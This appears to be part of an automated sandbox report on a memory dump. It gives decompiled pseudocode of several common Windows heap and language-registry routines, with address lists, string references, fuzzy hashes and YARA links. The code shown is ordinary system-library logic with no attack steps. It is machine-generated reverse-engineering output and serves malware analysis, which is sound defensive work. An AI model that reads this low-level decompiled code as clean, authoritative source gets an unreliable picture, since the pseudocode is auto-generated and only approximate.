					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E010CD4F0(_t83, 0x1056c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0107B150();
					} else {
						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E0107B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1166378 = 1;
						asm("int3");
						 *0x1166378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                                            0x011223e3
                                                                            0x011223e8
                                                                            0x011223eb
                                                                            0x011223ee
                                                                            0x011223f3
                                                                            0x0112259b
                                                                            0x0112259b
                                                                            0x0112259d
                                                                            0x011225a3
                                                                            0x011225a3
                                                                            0x011223fb
                                                                            0x01122424
                                                                            0x0112244f
                                                                            0x01122460
                                                                            0x01122451
                                                                            0x01122451
                                                                            0x01122456
                                                                            0x01122458
                                                                            0x01122458
                                                                            0x0112245b
                                                                            0x0112245b
                                                                            0x01122426
                                                                            0x01122431
                                                                            0x01122436
                                                                            0x01122443
                                                                            0x01122438
                                                                            0x01122438
                                                                            0x01122438
                                                                            0x01122445
                                                                            0x01122445
                                                                            0x01122463
                                                                            0x01122469
                                                                            0x0112246f
                                                                            0x01122480
                                                                            0x01122495
                                                                            0x011224a1
                                                                            0x011224ce
                                                                            0x011224df
                                                                            0x011224d0
                                                                            0x011224d0
                                                                            0x011224d5
                                                                            0x011224d7
                                                                            0x011224d7
                                                                            0x011224da
                                                                            0x011224da
                                                                            0x011224a3
                                                                            0x011224b0
                                                                            0x011224b5
                                                                            0x011224c2
                                                                            0x011224b7
                                                                            0x011224b7
                                                                            0x011224b7
                                                                            0x011224c4
                                                                            0x011224c4
                                                                            0x011224e8
                                                                            0x01122497
                                                                            0x0112249a
                                                                            0x0112249a
                                                                            0x01122482
                                                                            0x01122488
                                                                            0x01122488
                                                                            0x01122471
                                                                            0x01122479
                                                                            0x01122479
                                                                            0x011224ef
                                                                            0x011223fd
                                                                            0x01122401
                                                                            0x01122412
                                                                            0x01122403
                                                                            0x01122403
                                                                            0x01122408
                                                                            0x0112240a
                                                                            0x0112240a
                                                                            0x0112240d
                                                                            0x0112240d
                                                                            0x0112241b
                                                                            0x0112241b
                                                                            0x011224f1
                                                                            0x011224f6
                                                                            0x01122507
                                                                            0x01122510
                                                                            0x00000000
                                                                            0x01122510
                                                                            0x0112250b
                                                                            0x00000000
                                                                            0x011224f8
                                                                            0x011224f8
                                                                            0x011224fc
                                                                            0x01122500
                                                                            0x01122512
                                                                            0x01122515
                                                                            0x0112251a
                                                                            0x01122521
                                                                            0x01122524
                                                                            0x01122529
                                                                            0x0112252f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0112253c
                                                                            0x0112255c
                                                                            0x01122561
                                                                            0x0112253e
                                                                            0x01122554
                                                                            0x01122559
                                                                            0x0112256a
                                                                            0x0112256d
                                                                            0x01122574
                                                                            0x01122586
                                                                            0x01122588
                                                                            0x0112258f
                                                                            0x01122590
                                                                            0x01122590
                                                                            0x01122597
                                                                            0x00000000
                                                                            0x01122597

                                                                            Strings
                                                                            • HEAP: , xrefs: 0112255C
                                                                            • HEAP[%wZ]: , xrefs: 0112254F
                                                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0112256F
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                            • API String ID: 0-3815128232
                                                                            • Opcode ID: d3be904a2782c08c6aa73e788eec9195d92ca310a6b249d91fa7beb073d0e610
                                                                            • Instruction ID: 06807e941fa8c55778a41ef14ad164a3ac2ef26bb49770db16d546788d239929
                                                                            • Opcode Fuzzy Hash: d3be904a2782c08c6aa73e788eec9195d92ca310a6b249d91fa7beb073d0e610
                                                                            • Instruction Fuzzy Hash: C65148342002B08AE37CCF1EC8447BA7BF1DF48644F558859E8D28B285D77AD867DB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0107E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 93%
                                                                            			E0107E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0107F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E010B95D0();
						}
						if(_t78 != 0) {
							L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E010BFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E010BBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E010B9600();
					if(_t97 < 0) {
						goto L6;
					}
					E010BBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0107F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E010BBB40(_t83, _t102 + 0x24, _t78);
								if(L010843C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E010BBB40(_t84, _t102 + 0x24, _t94);
									if(L010843C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                            0x0107e620
                                                                            0x0107e628
                                                                            0x0107e62f
                                                                            0x0107e631
                                                                            0x0107e635
                                                                            0x0107e637
                                                                            0x0107e63e
                                                                            0x010d5503
                                                                            0x010d5503
                                                                            0x0107e64c
                                                                            0x0107e64c
                                                                            0x0107e651
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0107e661
                                                                            0x0107e665
                                                                            0x010d542a
                                                                            0x0107e715
                                                                            0x0107e71a
                                                                            0x0107e71c
                                                                            0x0107e720
                                                                            0x0107e720
                                                                            0x0107e727
                                                                            0x0107e736
                                                                            0x0107e736
                                                                            0x0107e743
                                                                            0x0107e743
                                                                            0x0107e673
                                                                            0x0107e678
                                                                            0x0107e67d
                                                                            0x0107e682
                                                                            0x0107e685
                                                                            0x0107e692
                                                                            0x0107e69b
                                                                            0x0107e6a3
                                                                            0x0107e6ad
                                                                            0x0107e6b1
                                                                            0x0107e6b2
                                                                            0x0107e6bb
                                                                            0x0107e6bf
                                                                            0x0107e6c0
                                                                            0x0107e6c8
                                                                            0x0107e6cc
                                                                            0x0107e6d5
                                                                            0x0107e6d9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0107e6e5
                                                                            0x0107e6ea
                                                                            0x0107e6f9
                                                                            0x0107e70b
                                                                            0x0107e70f
                                                                            0x010d5439
                                                                            0x010d545e
                                                                            0x010d545e
                                                                            0x00000000
                                                                            0x010d545e
                                                                            0x010d543b
                                                                            0x010d543e
                                                                            0x010d5440
                                                                            0x010d5445
                                                                            0x010d5472
                                                                            0x010d5475
                                                                            0x010d548d
                                                                            0x010d5493
                                                                            0x010d54a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d54ab
                                                                            0x010d54b4
                                                                            0x010d54bc
                                                                            0x010d54c8
                                                                            0x010d54de
                                                                            0x010d54fb
                                                                            0x010d54e0
                                                                            0x010d54e6
                                                                            0x010d54eb
                                                                            0x010d54eb
                                                                            0x010d54de
                                                                            0x00000000
                                                                            0x010d54bc
                                                                            0x010d5477
                                                                            0x010d547a
                                                                            0x010d5480
                                                                            0x010d5483
                                                                            0x010d5486
                                                                            0x010d548b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d548b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d5447
                                                                            0x010d5447
                                                                            0x010d5447
                                                                            0x010d5447
                                                                            0x010d544e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d5450
                                                                            0x010d5452
                                                                            0x010d5455
                                                                            0x010d545a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010d545c
                                                                            0x010d546a
                                                                            0x010d546d
                                                                            0x010d546f
                                                                            0x00000000
                                                                            0x010d546f
                                                                            0x0107e70f

                                                                            Strings
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0107E68C
                                                                            • InstallLanguageFallback, xrefs: 0107E6DB
                                                                            • @, xrefs: 0107E6C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                            • API String ID: 0-1757540487
                                                                            • Opcode ID: c11b45ff6c908f5dd55b7ee9bbd0d071fed8be6471cd33edafce09420050f1ce
                                                                            • Instruction ID: 819156aa10d802c8b53294cd63c35f9c3dc7bf23a862656bdcbb302fe4205b28
                                                                            • Opcode Fuzzy Hash: c11b45ff6c908f5dd55b7ee9bbd0d071fed8be6471cd33edafce09420050f1ce
                                                                            • Instruction Fuzzy Hash: 0651B3725093469BD711DF28C880AABB7E8BF88714F4409AEF9C5D7240FB34D904C7A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0109B8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 60%
                                                                            			E0109B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x1168748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E0107B150();
						} else {
							E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E0107B150();
						__eflags =  *0x1167bc8;
						if(__eflags == 0) {
							E01132073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E0109AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                                            0x0109b8f0
                                                                            0x0109b8f2
                                                                            0x0109b8f4
                                                                            0x010e2c4e
                                                                            0x010e2c50
                                                                            0x010e2c56
                                                                            0x010e2c5c
                                                                            0x010e2c60
                                                                            0x010e2c7f
                                                                            0x010e2c84
                                                                            0x010e2c62
                                                                            0x010e2c77
                                                                            0x010e2c7c
                                                                            0x010e2c8a
                                                                            0x010e2c8f
                                                                            0x010e2c94
                                                                            0x010e2c9c
                                                                            0x010e2ca5
                                                                            0x010e2ca5
                                                                            0x010e2c9c
                                                                            0x010e2c50
                                                                            0x0109b8fa
                                                                            0x0109b902
                                                                            0x0109b921
                                                                            0x0109b921
                                                                            0x0109b924
                                                                            0x0109b924
                                                                            0x0109b927
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109b929
                                                                            0x0109b92b
                                                                            0x0109b92d
                                                                            0x0109b940
                                                                            0x00000000
                                                                            0x0109b940
                                                                            0x0109b932
                                                                            0x0109b932
                                                                            0x00000000
                                                                            0x0109b932
                                                                            0x00000000
                                                                            0x0109b904
                                                                            0x0109b904
                                                                            0x0109b90a
                                                                            0x0109b90c
                                                                            0x0109b916
                                                                            0x0109b919
                                                                            0x0109b915
                                                                            0x0109b915
                                                                            0x0109b91b
                                                                            0x0109b91b
                                                                            0x00000000
                                                                            0x0109b910

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-2558761708
                                                                            • Opcode ID: f669878f2038074853e7808e497d96e75a371c94bbcfaf906677555ace4772a2
                                                                            • Instruction ID: c352a5baa35030d2d276f977a0ddd2a58c8e2b5f4db728df188552e367285eb4
                                                                            • Opcode Fuzzy Hash: f669878f2038074853e7808e497d96e75a371c94bbcfaf906677555ace4772a2
                                                                            • Instruction Fuzzy Hash: 7B11D3317241069FDB69D71AE4A4F7AB7E5EF80634F148069E4C6CB251E630D880E785
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0113E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 60%
                                                                            			E0113E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0113BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0113BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0113AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E010B9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0113A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0113A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E010B9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0113A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0113A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01092280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0108B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0108FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01097D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0112FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                            0x0113e547
                                                                            0x0113e549
                                                                            0x0113e54f
                                                                            0x0113e553
                                                                            0x0113e557
                                                                            0x0113e55a
                                                                            0x0113e55c
                                                                            0x0113e55f
                                                                            0x0113e561
                                                                            0x0113e567
                                                                            0x0113e56b
                                                                            0x0113e7e2
                                                                            0x00000000
                                                                            0x0113e571
                                                                            0x0113e575
                                                                            0x0113e577
                                                                            0x0113e57b
                                                                            0x0113e57c
                                                                            0x0113e57d
                                                                            0x0113e57e
                                                                            0x0113e57f
                                                                            0x0113e588
                                                                            0x0113e58f
                                                                            0x0113e591
                                                                            0x0113e592
                                                                            0x0113e592
                                                                            0x0113e596
                                                                            0x0113e59e
                                                                            0x0113e5a0
                                                                            0x0113e5a6
                                                                            0x0113e61d
                                                                            0x0113e61d
                                                                            0x0113e621
                                                                            0x0113e623
                                                                            0x0113e630
                                                                            0x0113e630
                                                                            0x0113e7e6
                                                                            0x0113e7eb
                                                                            0x0113e7ed
                                                                            0x0113e7f4
                                                                            0x0113e7fa
                                                                            0x0113e7ff
                                                                            0x0113e7ff
                                                                            0x0113e80a
                                                                            0x0113e812
                                                                            0x0113e812
                                                                            0x0113e5ab
                                                                            0x0113e5b4
                                                                            0x0113e5b9
                                                                            0x0113e5be
                                                                            0x0113e5c0
                                                                            0x0113e5c2
                                                                            0x0113e5c8
                                                                            0x0113e5c9
                                                                            0x0113e5cb
                                                                            0x0113e5cc
                                                                            0x0113e5d5
                                                                            0x0113e5e4
                                                                            0x0113e5f1
                                                                            0x0113e5f8
                                                                            0x0113e5f8
                                                                            0x0113e5d5
                                                                            0x0113e602
                                                                            0x0113e616
                                                                            0x0113e63d
                                                                            0x0113e644
                                                                            0x0113e64d
                                                                            0x0113e652
                                                                            0x0113e657
                                                                            0x0113e659
                                                                            0x0113e65b
                                                                            0x0113e661
                                                                            0x0113e662
                                                                            0x0113e664
                                                                            0x0113e665
                                                                            0x0113e66e
                                                                            0x0113e67d
                                                                            0x0113e68a
                                                                            0x0113e691
                                                                            0x0113e691
                                                                            0x0113e66e
                                                                            0x0113e6b0
                                                                            0x00000000
                                                                            0x0113e6b6
                                                                            0x0113e6bd
                                                                            0x0113e6c7
                                                                            0x0113e6d7
                                                                            0x0113e6d9
                                                                            0x0113e6db
                                                                            0x0113e6de
                                                                            0x0113e6e3
                                                                            0x0113e6f3
                                                                            0x0113e6fc
                                                                            0x0113e700
                                                                            0x0113e700
                                                                            0x0113e704
                                                                            0x0113e70a
                                                                            0x0113e70a
                                                                            0x0113e713
                                                                            0x0113e716
                                                                            0x0113e719
                                                                            0x0113e720
                                                                            0x0113e761
                                                                            0x0113e76b
                                                                            0x0113e774
                                                                            0x0113e77a
                                                                            0x0113e77a
                                                                            0x0113e78a
                                                                            0x0113e791
                                                                            0x0113e799
                                                                            0x0113e79b
                                                                            0x0113e79f
                                                                            0x0113e7aa
                                                                            0x0113e7c0
                                                                            0x0113e7ac
                                                                            0x0113e7b2
                                                                            0x0113e7b9
                                                                            0x0113e7b9
                                                                            0x0113e7c7
                                                                            0x0113e806
                                                                            0x00000000
                                                                            0x0113e7c9
                                                                            0x0113e7d1
                                                                            0x0113e7d8
                                                                            0x00000000
                                                                            0x0113e7d8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0113e722
                                                                            0x0113e72e
                                                                            0x0113e748
                                                                            0x0113e74c
                                                                            0x0113e754
                                                                            0x0113e756
                                                                            0x0113e75c
                                                                            0x0113e75c
                                                                            0x00000000
                                                                            0x0113e75c
                                                                            0x0113e758
                                                                            0x0113e758
                                                                            0x00000000
                                                                            0x0113e758
                                                                            0x0113e750
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0113e752
                                                                            0x00000000
                                                                            0x0113e752
                                                                            0x0113e730
                                                                            0x0113e735
                                                                            0x0113e73d
                                                                            0x0113e73f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0113e741
                                                                            0x0113e741
                                                                            0x00000000
                                                                            0x0113e741
                                                                            0x0113e739
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0113e73b
                                                                            0x00000000
                                                                            0x0113e73b
                                                                            0x0113e722
                                                                            0x0113e720
                                                                            0x0113e6b0
                                                                            0x0113e618
                                                                            0x00000000
                                                                            0x0113e618

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `$`
                                                                            • API String ID: 0-197956300
                                                                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                            • Instruction ID: d3ad5017c93a25abe0a70127c1a01081a37177a975a3001a4b8100819833a295
                                                                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                            • Instruction Fuzzy Hash: 01919E712057429FE729CF29C841B5BBBE5AFC4714F14892DF699CB284E774E804CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010F51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 77%
                                                                            			E010F51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x11505f0);
				E010CD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0108EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E010F53CA(0);
						return E010CD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E010BF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01093690(1, _t117, 0x1051810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
